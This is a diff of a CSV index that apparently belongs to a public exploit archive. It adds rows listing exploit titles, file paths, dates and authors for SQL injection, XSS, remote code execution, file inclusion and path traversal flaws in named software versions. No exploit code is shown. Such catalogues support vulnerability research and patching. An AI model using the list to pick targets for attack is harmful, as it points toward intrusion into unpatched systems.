 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43463,3 +43466,18 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,